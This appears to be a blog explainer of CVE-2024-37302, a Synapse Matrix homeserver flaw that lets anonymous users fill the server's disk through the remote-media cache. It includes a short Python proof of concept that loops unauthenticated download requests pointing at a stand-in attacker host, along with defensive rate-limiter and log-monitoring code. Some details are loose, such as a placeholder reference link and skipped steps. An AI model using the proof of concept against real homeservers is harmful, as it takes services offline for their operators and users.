CVE-2024-37302 - Synapse Homeserver Disk Fill Vulnerability Explained — How Attackers Could Deny Your Matrix Service

In June 2024, a new critical vulnerability was discovered in Synapse, the popular open-source Matrix homeserver. Tagged as CVE-2024-37302, this bug gives attackers a free and easy way to fill your server's disk space and possibly take your entire Matrix service offline.

This post covers what the patch in v1.106 changed, and what still needs to be done to be fully secure.

By the end, you'll know how to protect your Synapse server — and what more still needs to be done by the community.

---

Affected Versions: All versions before 1.106

- What happens? Any unauthenticated user can trigger Synapse to download *large* remote media files and store them on your server—over and over.
- What is the result? Disk space is quickly consumed; service can crash or become unavailable—a classic Denial of Service (DoS) attack.

Understanding the Synapse Media Cache

Synapse is designed so that when users fetch images, attachments, or avatars from other Matrix homeservers, it caches copies on the local server disk. Normally, this is convenient and makes future requests faster and less bandwidth-heavy.

The problem: The default rate limits and access controls *before* 1.106 do not limit anonymous access to this download-and-cache behavior, and do not track total disk space usage for cached media per user or source.

1. Connect as an anonymous client
2. Request media from remote locations (could be on remote Matrix servers or even attacker-controlled endpoints)

Repeat 2-3 with lots of unique filenames or oversized files

Since none of these requests require authentication, anyone on the Internet can fill the server’s disk.

Exploit: Python PoC

Below is a simple code snippet that demonstrates what an attack might look like.

```python
import requests

MATRIX_SERVER = "https://target-synapse-server.example.com"
REMOTE_SERVER = "evil-payload.example.com"
MEDIA_ID_LIST = [f"hugefile-{i}" for i in range(100)]  # attackers generate lots of file names

for media_id in MEDIA_ID_LIST:
    # Unauthenticated request for media that lives on a remote server
    url = (
        f"{MATRIX_SERVER}/_matrix/media/v3/download/"
        f"{REMOTE_SERVER}/{media_id}"
    )
    print(f"Requesting: {url}")
    r = requests.get(url)
    # Synapse downloads and caches the file, filling up disk space!
```

What the attacker does:
- Put large/unique files at the remote server

Why Wasn't This Caught Earlier?

While Synapse had some generic rate limiting, it was *per request*, not per data volume, and did not apply to unauthenticated media download requests from remote sources. Popular use cases in Matrix (like sharing memes and images) made disabling this cache behavior impractical.

What Did the Patch in v1.106 Change?

Synapse v1.106 introduced a new "leaky bucket" rate limit specifically for remote media downloads. This means:

- There's now a cap on how much data a single user (even unauthenticated) can have downloaded/cached in a given timeframe.
- This slows down attackers, making it less practical to fill the disk quickly — but does *not* entirely prevent the attack, especially against determined attackers or botnets.
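To make the "slows down but does not prevent" point concrete, here is an added illustration of a byte-volume leaky bucket keyed per requester. It is not Synapse's implementation and the capacity and drain rate are constructed values, not Synapse's defaults; `simulate_burst` replays a stream of same-sized requests against the limiter and reports how many get through.

```python
import time
from dataclasses import dataclass, field
from typing import Dict, Optional


@dataclass
class LeakyBucket:
    """Byte-volume leaky bucket (illustrative, not Synapse's code).

    `capacity` is the burst allowance in bytes; the bucket drains at
    `drain_rate` bytes per second, so sustained throughput is capped at
    drain_rate no matter how many requests arrive.
    """
    capacity: float
    drain_rate: float
    level: float = 0.0
    last: float = field(default_factory=time.monotonic)

    def _drain(self, now: float) -> None:
        elapsed = max(0.0, now - self.last)
        self.level = max(0.0, self.level - elapsed * self.drain_rate)
        self.last = now

    def try_consume(self, nbytes: float, now: Optional[float] = None) -> bool:
        """Account for `nbytes` and return True if there is room, else False."""
        now = time.monotonic() if now is None else now
        self._drain(now)
        if self.level + nbytes > self.capacity:
            return False
        self.level += nbytes
        return True


class RemoteMediaLimiter:
    """One bucket per requester key (e.g. the client IP for unauthenticated
    requests, the user ID for authenticated ones)."""

    def __init__(self, capacity: float, drain_rate: float) -> None:
        self.capacity = capacity
        self.drain_rate = drain_rate
        self._buckets: Dict[str, LeakyBucket] = {}

    def allow(self, requester: str, nbytes: float, now: float) -> bool:
        bucket = self._buckets.get(requester)
        if bucket is None:
            bucket = LeakyBucket(self.capacity, self.drain_rate, last=now)
            self._buckets[requester] = bucket
        return bucket.try_consume(nbytes, now)


def simulate_burst(limiter, requester, request_bytes, n_requests, interval):
    """Replay `n_requests` downloads of `request_bytes` each, one every
    `interval` seconds. Returns (allowed_count, bytes_admitted)."""
    allowed = 0
    for i in range(n_requests):
        if limiter.allow(requester, request_bytes, now=i * interval):
            allowed += 1
    return allowed, allowed * request_bytes


MB = 1_000_000

if __name__ == "__main__":
    # Constructed parameters: 100 MB burst allowance, draining at 10 MB/s.
    limiter = RemoteMediaLimiter(capacity=100 * MB, drain_rate=10 * MB)
    allowed, admitted = simulate_burst(limiter, "203.0.113.7", 50 * MB, 10, 1.0)
    print(f"allowed {allowed}/10 requests, {admitted // MB} MB admitted in 10 s")
    # Without the bucket all 10 requests (500 MB) would have been cached; with
    # it the cache still grows, just no faster than the drain rate.
```

The point of the simulation is the steady state: once the burst allowance is spent, admitted bytes are bounded by `drain_rate` times elapsed time per requester, which is why the page calls this a slow-down rather than a fix, and why the bound is per key (a botnet with many source addresses gets many buckets).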

Excerpt from the changelog

> "Synapse 1.106 introduces a new 'leaky bucket' rate limit on remote media downloads to reduce the amount of data a user can request at a time… does limit an unauthenticated user's ability to request large amounts of data to be cached."

Read more

- Synapse PR 17444 - Media rate limiting
- Security Advisory

Monitor your media cache

Set alerts for disk space consumption in your Matrix data directory (default: /var/lib/synapse/media).

Consider network-level rate limiting

Use firewalls or reverse proxies to restrict access if possible, especially to the /download/ endpoints.
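The two operational controls above (watching the media cache and restricting the download endpoints at the reverse proxy) both need a way to see who is pulling remote media through the server. The following is an added example, not part of the original post and not Synapse tooling: it parses nginx-style access-log lines for `/_matrix/media/*/download/{origin}/{media_id}` requests, totals requests and bytes per client IP for remote origins only, flags clients over a threshold, and sizes the media store on disk. The log lines, IP addresses, origins, thresholds and the media path are all constructed or placeholder values.

```python
import os
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, Iterable, List, Optional

# nginx "combined" access-log line; the bytes field is the response body size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)
# Media download endpoint: /_matrix/media/{r0,v3}/download/{origin}/{media_id}
DOWNLOAD_RE = re.compile(
    r"^/_matrix/media/(?:r0|v3)/download/(?P<origin>[^/?]+)/(?P<media_id>[^/?]+)"
)


def parse_line(line: str) -> Optional[dict]:
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
    return rec


def summarise_remote_downloads(lines: Iterable[str], local_server: str) -> Dict[str, dict]:
    """Per client IP: remote-media downloads triggered and response bytes served.
    Downloads of local media are skipped because they do not grow the cache."""
    stats: Dict[str, dict] = defaultdict(
        lambda: {"requests": 0, "bytes": 0, "origins": set()}
    )
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "GET":
            continue
        dm = DOWNLOAD_RE.match(rec["path"])
        if dm is None or dm.group("origin") == local_server:
            continue
        s = stats[rec["ip"]]
        s["requests"] += 1
        s["bytes"] += rec["bytes"]
        s["origins"].add(dm.group("origin"))
    return dict(stats)


def flag_clients(stats, max_requests: int = 20, max_bytes: int = 500_000_000) -> List[str]:
    """IPs that exceed either threshold within the analysed log window."""
    return sorted(
        ip for ip, s in stats.items()
        if s["requests"] > max_requests or s["bytes"] > max_bytes
    )


def media_store_bytes(path: str) -> int:
    """Total size of the media store on disk, for the disk-usage alert."""
    total = 0
    for root, _dirs, files in os.walk(path):
        for name in files:
            try:
                total += os.path.getsize(os.path.join(root, name))
            except OSError:
                pass
    return total


def constructed_log_lines() -> List[str]:
    """Constructed sample: one ordinary user plus one client pulling 50 MB
    files from a remote origin through the download endpoint 25 times."""
    fmt = ('{ip} - - [12/Jun/2024:10:00:{sec:02d} +0000] "GET {path} HTTP/1.1" '
           '200 {size} "-" "{ua}"')
    lines = [
        fmt.format(ip="198.51.100.20", sec=1, size=204_800, ua="Element/1.11",
                   path="/_matrix/media/v3/download/example.org/abc123"),
        fmt.format(ip="198.51.100.20", sec=2, size=1_048_576, ua="Element/1.11",
                   path="/_matrix/media/v3/download/local.example.com/def456"),
    ]
    for i in range(25):
        lines.append(fmt.format(
            ip="203.0.113.7", sec=i % 60, size=52_428_800, ua="python-requests/2.31",
            path=f"/_matrix/media/v3/download/evil-payload.example.com/hugefile-{i}",
        ))
    return lines


if __name__ == "__main__":
    stats = summarise_remote_downloads(constructed_log_lines(), "local.example.com")
    for ip in flag_clients(stats):
        s = stats[ip]
        print(f"ALERT {ip}: {s['requests']} remote downloads, "
              f"{s['bytes'] / 1e6:.0f} MB, origins={sorted(s['origins'])}")
    media_dir = "/var/lib/synapse/media"  # placeholder; use your media_store_path
    if os.path.isdir(media_dir):
        print(f"media store: {media_store_bytes(media_dir) / 1e9:.2f} GB")
```

Count requests as well as bytes: the proxy logs what was sent to the client, and a client that drops the connection early may still have caused the homeserver to fetch and store the whole file, so a high request count with low logged bytes is still worth an alert. Thresholds should be tuned to your own baseline before the output feeds a firewall or proxy rule.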

Watch for future updates

This "leaky bucket" is a partial fix; a full solution may require deeper changes in Synapse's caching logic.

What More Needs to Be Done?

Even with Synapse 1.106, a motivated attacker could eventually fill the disk—it just takes longer per user. A true fix likely needs:

Smarter cache eviction policies

Join the conversation on the Matrix dev room for ongoing fixes.

References

- GitHub Security Advisory: CVE-2024-37302 *(update with correct link)*
- Synapse v1.106 Release Notes
- Matrix Synapse Media API Docs
- Matrix.org blog

Conclusion

CVE-2024-37302 is a classic example of how open endpoints and smart caching can be abused in unexpected ways. While Synapse's partial fix limits risk, server operators should upgrade fast, monitor disk use, and look for stronger fixes soon.

*Keep your Matrix homeserver safe!*

*If you found this helpful, share with your Matrix admin friends. Questions or suggestions? Join the discussion on Matrix: #synapse:matrix.org.*

Timeline

Published on: 12/03/2024 17:15:10 UTC